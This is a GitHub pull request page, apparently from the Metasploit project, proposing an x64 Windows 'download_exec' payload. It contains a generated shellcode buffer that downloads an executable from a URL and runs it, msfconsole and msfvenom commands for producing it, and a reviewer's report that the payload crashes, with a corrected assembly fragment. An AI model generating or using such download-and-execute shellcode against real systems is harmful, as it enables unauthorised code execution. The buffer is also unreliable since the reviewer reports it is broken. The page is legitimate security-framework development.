Skip to content

Converted the download_exec windows payload to support x64 (Fixes Issue #12876) #19988

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Draft
wants to merge 4 commits into
base: master
Choose a base branch
from
Draft

Converted the download_exec windows payload to support x64 (Fixes Issue #12876) #19988

wants to merge 4 commits into from

Conversation

its-mr-monday
Copy link

@its-mr-monday its-mr-monday commented Mar 27, 2025
edited
Loading

Fixes #12876

The commit used the windows download_exec payload as a reference (x86), I figured that it would be useful to other operators to have a x64 variant of the payload

Verification

Its a simple drop in place payload, copy it over to the payloads/singles/windows/x64 directory and in my case run:

  • reload_all

From here you should have the payload loaded, to generate a sample you may run:

  • use payload/windows/x64/download_exec
  • set EXE <executable name to drop on disk>
  • set URL <endpoint of hosted PE file>
  • (OPTIONAL) set EXITFUNC <seh/thread/process/none>
  • generate

The module does not exploit anything, it simply drops a PE file on disk and calls CreateProcessA to spawn a process

Here is an example usage:

msf6 > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > set EXE test.exe
EXE => test.exe
msf6 payload(windows/x64/download_exec) > set URL https://example.com/test.exe
URL => https://example.com/test.exe
msf6 payload(windows/x64/download_exec) > set EXITFUNC thread
EXITFUNC => thread
msf6 payload(windows/x64/download_exec) > generate
# windows/x64/download_exec - 526 bytes
# https://metasploit.com/
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# URL=https://example.com/test.exe, EXE=test.exe
buf =
"\xfc\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48" +
"\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b\x42\x3c" +
"\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00" +
"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +
"\xd0\x50\x44\x8b\x40\x20\x49\x01\xd0\x8b\x48\x18\xe3\x56" +
"\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48" +
"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" +
"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40" +
"\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" +
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e" +
"\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52" +
"\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff" +
"\x5d\x48\x83\xec\x20\x48\xb9\x77\x69\x6e\x69\x6e\x65\x74" +
"\x00\x51\x54\x48\x89\xe1\x48\xc7\xc2\x4c\x77\x26\x07\xff" +
"\x55\xf8\x48\x83\xc4\x20\x48\x31\xc9\x48\x89\xca\x49\x89" +
"\xc8\x49\x89\xc9\x48\x8d\x4c\x24\x08\x48\xb8\x3a\x56\x79" +
"\xa7\x00\x00\x00\x00\xff\x55\xf8\x48\x8d\x54\x24\x20\x41" +
"\xb8\xbb\x01\x00\x00\x45\x31\xc9\x44\x89\x4c\x24\x28\x44" +
"\x89\x4c\x24\x30\x44\x89\x4c\x24\x38\x48\xc7\x44\x24\x40" +
"\x03\x00\x00\x00\x44\x89\x4c\x24\x48\x48\x89\x44\x24\x50" +
"\x48\xb8\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\x55\xf8\x48" +
"\x31\xc9\x48\x31\xd2\x49\x89\xe0\x45\x31\xc9\x44\x89\x4c" +
"\x24\x08\x41\xb9\x00\x00\x40\x08\x48\xc7\xc0\xeb\x55\x2e" +
"\x3b\xff\x55\xf8\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d" +
"\x31\xc9\x48\xc7\xc0\x2d\x06\x18\x7b\xff\x55\xf8\x48\x31" +
"\xc9\x48\x89\xe2\x4d\x31\xc0\x41\xb9\x02\x00\x00\x00\x48" +
"\xc7\x44\x24\x08\x02\x00\x00\x00\x48\x31\xc0\x48\x89\x44" +
"\x24\x10\x48\x89\x44\x24\x18\x48\x89\x44\x24\x20\x48\xc7" +
"\xc0\xda\xf6\xda\x4f\xff\x55\xf8\x48\x89\xc1\x48\x89\xda" +
"\x49\x89\xf8\x4c\x8d\x4c\x24\x08\x48\xc7\xc0\x2d\x57\xae" +
"\x5b\xff\x55\xf8\x48\x89\xc1\x48\xc7\xc0\xc6\x96\x87\x52" +
"\xff\x55\xf8\x48\x8d\x4c\x24\x20\x48\x31\xd2\x49\x89\xd0" +
"\x49\x89\xd1\x48\xb8\x79\xcc\x3f\x86\x00\x00\x00\x00\xff" +
"\x55\xf8\x45\x31\xc9\x48\xc7\xc1\x00\x00\x00\x00\x48\xc7" +
"\xc2\xe0\x1d\x2a\x0a\xff\x55\xf8"

You may also use it with msfvenom to generate shellcode:

msfvenom -p windows/x64/download_exec -f <output_fmt> EXE=<executable> URL=<url> EXITFUNC=<exitfunc>

@its-mr-monday its-mr-monday changed the title Converted the download_exec windows payload to support x64 Converted the download_exec windows payload to support x64 (Fixes Issue #12876) Mar 27, 2025
its-mr-monday and others added 2 commits March 27, 2025 10:40
@its-mr-monday @smcintyre-r7
Apply suggestions from code review
b990eb9 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@its-mr-monday
Ensured to check URI matches supported schemes
f927687 
Ensured the URI matches the supported schemes, if not a "Invalid URL" error will print and return null
@dledda-r7 dledda-r7 self-assigned this Mar 28, 2025
@dledda-r7 dledda-r7 added payload rn-payload-enhancement release notes for enhanced payloads labels Mar 28, 2025
@dledda-r7 dledda-r7 moved this to In Progress in Metasploit Kanban Mar 28, 2025
@its-mr-monday
Fixed EOF tab indexing for msftidy
fd89a93 
Simply fixed the tab indenting at the EOF
dledda-r7
dledda-r7 requested changes Mar 31, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @its-mr-monday,
I have tried the payload but is crashing and I have addressed just couple of issues:

  • the block api is stored in rbp but then [rbp-0x80] is used which cause a segfault.
  • the register to store the block_api_hash for block-api x64 is r10d

I didn't look for other errors but even correcting the two mentioned issues on the whole payload code it's still crashing.

I am leaving here just a sample of correct api calling.

    start:
      pop rbp
    load_wininet:
      sub rsp, 32
      mov rcx, 0x0074656e696e6977 ; "wininet"
      push rcx
      push rsp
      mov rcx, rsp
      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
      call rbp

@github-project-automation github-project-automation bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban Mar 31, 2025
@its-mr-monday its-mr-monday marked this pull request as draft April 1, 2025 14:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dledda-r7 dledda-r7 dledda-r7 requested changes

@OmegaGateway333 OmegaGateway333 OmegaGateway333 approved these changes

@smcintyre-r7 smcintyre-r7 Awaiting requested review from smcintyre-r7

@cgranleese-r7 cgranleese-r7 Awaiting requested review from cgranleese-r7

Requested changes must be addressed to merge this pull request.

Assignees

@dledda-r7 dledda-r7

Labels
payload rn-payload-enhancement release notes for enhanced payloads
Projects
Metasploit Kanban
Status: Waiting on Contributor
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

msfvenom -p windows/download_exec not working on 64bit / WOW64
5 participants
@its-mr-monday @smcintyre-r7 @cgranleese-r7 @dledda-r7 @OmegaGateway333